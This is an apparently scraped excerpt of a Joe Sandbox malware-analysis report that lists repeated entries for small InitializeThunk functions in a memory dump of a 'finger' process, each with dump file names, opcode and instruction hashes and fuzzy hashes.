                                                                                                                                      • Opcode ID: 1cd20186e759e6351d983e6f235037a090fb2e5414a9fe944c6e4cca1723c09b
                                                                                                                                      • Instruction ID: 21c52cbf153cd482423932899713112e1f6e3f4161ddcd5b4a8a04ff52b3e0eb
                                                                                                                                      • Opcode Fuzzy Hash: 1cd20186e759e6351d983e6f235037a090fb2e5414a9fe944c6e4cca1723c09b
                                                                                                                                      • Instruction Fuzzy Hash: 0AE04F352002447BD210EA59DC41FAB775CDBC5714F008459FA18A7181C770B90086E5
                                                                                                                                      Function 03524340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 89d0d84c3f00920b72d717e6ca69ccd101b3c706bf09ae6793e5213d4ff46920
                                                                                                                                      • Instruction ID: 469d14fc99dbc940281d031aa54c4ebbb9dbbd81929efb9d52158c5f6167a7f9
                                                                                                                                      • Opcode Fuzzy Hash: 89d0d84c3f00920b72d717e6ca69ccd101b3c706bf09ae6793e5213d4ff46920
                                                                                                                                      • Instruction Fuzzy Hash: D5900231705804129144B15858845464155A7E1311B59C011F4428555C8B148A5A6361
                                                                                                                                      Function 03524650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 0b8a16f8d66b274948f33dba9a0a738a3facc1321fc13057b853f2308b98b7c5
                                                                                                                                      • Instruction ID: b976afe009942d07ce61cd83bcdce67e9aa90f45134771cdf7aaecc06ba374b8
                                                                                                                                      • Opcode Fuzzy Hash: 0b8a16f8d66b274948f33dba9a0a738a3facc1321fc13057b853f2308b98b7c5
                                                                                                                                      • Instruction Fuzzy Hash: 8A900261701504424144B15858044066155A7E2311399C115B4558561C87188959A269
                                                                                                                                      Function 03522B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: ff80b0e282599350e48c54d8b1d9905e80342f584313589ebf9567f5ee060188
                                                                                                                                      • Instruction ID: ab607f5ea34382ec9c5ebc7ffca3bc881c413bd787c88029ba447861d9105df1
                                                                                                                                      • Opcode Fuzzy Hash: ff80b0e282599350e48c54d8b1d9905e80342f584313589ebf9567f5ee060188
                                                                                                                                      • Instruction Fuzzy Hash: FC900261302404034109B1585414616415A97E1211B59C021F5018591DC62589957125
                                                                                                                                      Function 03522BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: a97d5e19e9c0bdf1ad9f9dda43b0e0529f13f1861a6c16ce039956c2a5e4aca2
                                                                                                                                      • Instruction ID: 206614b0961473bcbe6b2fa6d1a4fc306fa4557ddcb64934dfedab934d7fb26d
                                                                                                                                      • Opcode Fuzzy Hash: a97d5e19e9c0bdf1ad9f9dda43b0e0529f13f1861a6c16ce039956c2a5e4aca2
                                                                                                                                      • Instruction Fuzzy Hash: 9D90023130140C02D184B158540464A015597D2311F99C015B4029655DCB158B5D77A1
                                                                                                                                      Function 03522BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 4cb55096293e934d843f08e2c674af72afeec42bf51c9b1f5e8a4aa5e38e24d4
                                                                                                                                      • Instruction ID: 07483e60c39d4cea2cc946fc064ad7467a539af5e8be7eb3a9523516a6e80717
                                                                                                                                      • Opcode Fuzzy Hash: 4cb55096293e934d843f08e2c674af72afeec42bf51c9b1f5e8a4aa5e38e24d4
                                                                                                                                      • Instruction Fuzzy Hash: D390023130544C42D144B1585404A46016597D1315F59C011B4068695D97258E59B661
                                                                                                                                      Function 03522BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: e5be63eba8391354439970c6819d7f275aa74def3a0c7cf92271a67ba9e3502e
                                                                                                                                      • Instruction ID: 9bbb6e1dde2de3c492d6be314dd0264ff68d5a790efdd8bed186304d3def66ca
                                                                                                                                      • Opcode Fuzzy Hash: e5be63eba8391354439970c6819d7f275aa74def3a0c7cf92271a67ba9e3502e
                                                                                                                                      • Instruction Fuzzy Hash: 7890023170540C02D154B1585414746015597D1311F59C011B4028655D87558B5976A1
                                                                                                                                      Function 03522AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 9364d2a4155bcb3e93d958527f1d0a09679e65665f9f227207463b6220b9b98f
                                                                                                                                      • Instruction ID: 86b3f4a3cbb2d5ecdd4eb9682bd4f340dedbb8d9a5e0f914db950dc6e0410ad8
                                                                                                                                      • Opcode Fuzzy Hash: 9364d2a4155bcb3e93d958527f1d0a09679e65665f9f227207463b6220b9b98f
                                                                                                                                      • Instruction Fuzzy Hash: 6C900225311404030109F5581704507019697D6361359C021F5019551CD72189656121
                                                                                                                                      Function 03522AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 685baa8758ebe7901f062034007ee5816978b16710c58819826e58aa8444fa8c
                                                                                                                                      • Instruction ID: db075ff0c61450e12f3cdfde7b2765852c93c4f7d6df5387ff87785d01930568
                                                                                                                                      • Opcode Fuzzy Hash: 685baa8758ebe7901f062034007ee5816978b16710c58819826e58aa8444fa8c
                                                                                                                                      • Instruction Fuzzy Hash: 2E900225321404020149F558160450B0595A7D7361399C015F541A591CC72189696321
                                                                                                                                      Function 03522F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 7eabb49ac4822a082533918e721a12a0d79fe1ec57619815248b07282a80caab
                                                                                                                                      • Instruction ID: 4258f8d91ffaf24b457a2871d5e118f6f01fecc19cc88b8b907fed1c16081415
                                                                                                                                      • Opcode Fuzzy Hash: 7eabb49ac4822a082533918e721a12a0d79fe1ec57619815248b07282a80caab
                                                                                                                                      • Instruction Fuzzy Hash: BF90026134140842D104B1585414B060155D7E2311F59C015F5068555D8719CD567126
                                                                                                                                      Function 03522FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 65b037e6460d81becfe29a8721cfa01e04df89b80af2c76197b92a5f85a4649f
                                                                                                                                      • Instruction ID: a12699776b088d93d6404ff479923087fd73636fd681186f2635f199001102b2
                                                                                                                                      • Opcode Fuzzy Hash: 65b037e6460d81becfe29a8721cfa01e04df89b80af2c76197b92a5f85a4649f
                                                                                                                                      • Instruction Fuzzy Hash: 3E900221311C0442D204B5685C14B07015597D1313F59C115B4158555CCA1589656521
                                                                                                                                      Function 03522FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: c83674b00c915a1d1112f8211ef372ace65907925b30e2e41c4c6324d1532819
                                                                                                                                      • Instruction ID: b558baeaef8bfceb301e963f4b6380d94e2f71ea82fcee96fc01383945167ad0
                                                                                                                                      • Opcode Fuzzy Hash: c83674b00c915a1d1112f8211ef372ace65907925b30e2e41c4c6324d1532819
                                                                                                                                      • Instruction Fuzzy Hash: 6E900221701404424144B16898449064155BBE2221759C121B499C551D865989696665
                                                                                                                                      Function 03522EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 3b5378a42476cac44255cafc2c5353302dfb3b0e693ef3cadd4bc6cf80bc5cf7
                                                                                                                                      • Instruction ID: 456c9d310ad12426946decd798a8d8ba4a02b6eaeedeb4f1154b062eed517bd6
                                                                                                                                      • Opcode Fuzzy Hash: 3b5378a42476cac44255cafc2c5353302dfb3b0e693ef3cadd4bc6cf80bc5cf7
                                                                                                                                      • Instruction Fuzzy Hash: 2D90026130180803D144B5585804607015597D1312F59C011B6068556E8B298D557135
                                                                                                                                      Function 03522E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 00499e897b8dd0f887039643cecb88b47bf26d22cb085d381b59fa9aa0c94e12
                                                                                                                                      • Instruction ID: b649f7e9edef4c53be1895239358b367c12dfc6922deb7dff9e279baf39885d4
                                                                                                                                      • Opcode Fuzzy Hash: 00499e897b8dd0f887039643cecb88b47bf26d22cb085d381b59fa9aa0c94e12
                                                                                                                                      • Instruction Fuzzy Hash: 4890022170140902D105B1585404616015A97D1251F99C022B5028556ECB258A96B131
                                                                                                                                      Function 03522D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 0bd708737541ffaed7b86b4c2f0c7d2c9efa7caa868e4b6471c5432e0e07653a
                                                                                                                                      • Instruction ID: fd6130e21295643b388c8253c917b869b794a08c152b077b573cad5adf6d1ef9
                                                                                                                                      • Opcode Fuzzy Hash: 0bd708737541ffaed7b86b4c2f0c7d2c9efa7caa868e4b6471c5432e0e07653a
                                                                                                                                      • Instruction Fuzzy Hash: E690022931340402D184B158640860A015597D2212F99D415B4019559CCA15896D6321
                                                                                                                                      Function 03522D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 6fe23c38cafb6d3d244e620c31b68ae0ef5326910c6ce488c94ffaee485d090c
                                                                                                                                      • Instruction ID: a7b853e57612b23372ab19f5bc15f2028476b5be0588e13d77e8619eb3d4c668
                                                                                                                                      • Opcode Fuzzy Hash: 6fe23c38cafb6d3d244e620c31b68ae0ef5326910c6ce488c94ffaee485d090c
                                                                                                                                      • Instruction Fuzzy Hash: 9890022130140403D144B15864186064155E7E2311F59D011F4418555CDA15895A6222
                                                                                                                                      Function 03522DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 2cf3a0d76d33781218c99d2528e788f6a14e570dd0dc99c407011964ea456eec
                                                                                                                                      • Instruction ID: f7ca76fe000919b838d0a7a2e1b402418cb5082bde00e0f82dac8f303ef7cf97
                                                                                                                                      • Opcode Fuzzy Hash: 2cf3a0d76d33781218c99d2528e788f6a14e570dd0dc99c407011964ea456eec
                                                                                                                                      • Instruction Fuzzy Hash: 96900221342445525549F15854045074156A7E1251799C012B5418951C8626995AE621
                                                                                                                                      Function 03522DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 2df7a8325322ce66fae796cfaded9103f28d45e56c962285bd93257fdd7efb3e
                                                                                                                                      • Instruction ID: 6b45f81a6b37624408b00426e13abc1f1468cdc0ea157f4f5015a017de5d7b83
                                                                                                                                      • Opcode Fuzzy Hash: 2df7a8325322ce66fae796cfaded9103f28d45e56c962285bd93257fdd7efb3e
                                                                                                                                      • Instruction Fuzzy Hash: 8890023130140813D115B1585504707015997D1251F99C412B4428559D97568A56B121
                                                                                                                                      Function 03522C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 3d64c53265a771595ca3ce794001283fffeabb7c562a77cd721494c66c5f1aec
                                                                                                                                      • Instruction ID: de0aa84109ac278eda2d2614cc441f9620b45c0f335288ec77c3d9bd8c07fba9
                                                                                                                                      • Opcode Fuzzy Hash: 3d64c53265a771595ca3ce794001283fffeabb7c562a77cd721494c66c5f1aec
                                                                                                                                      • Instruction Fuzzy Hash: B590023130148C02D114B158940474A015597D1311F5DC411B8428659D879589957121
                                                                                                                                      Function 03522C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 4f3a8376e6dcbffe2f3b7766d6e9691d874bc0f15eb75ebab85cfd28e3fab23c
                                                                                                                                      • Instruction ID: 230278b1ddc028d9bfd70a627793034bf1ebe7131021cd2e1f10924e15890255
                                                                                                                                      • Opcode Fuzzy Hash: 4f3a8376e6dcbffe2f3b7766d6e9691d874bc0f15eb75ebab85cfd28e3fab23c
                                                                                                                                      • Instruction Fuzzy Hash: D990023130140C42D104B1585404B46015597E1311F59C016B4128655D8715C9557521
                                                                                                                                      Function 03522CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
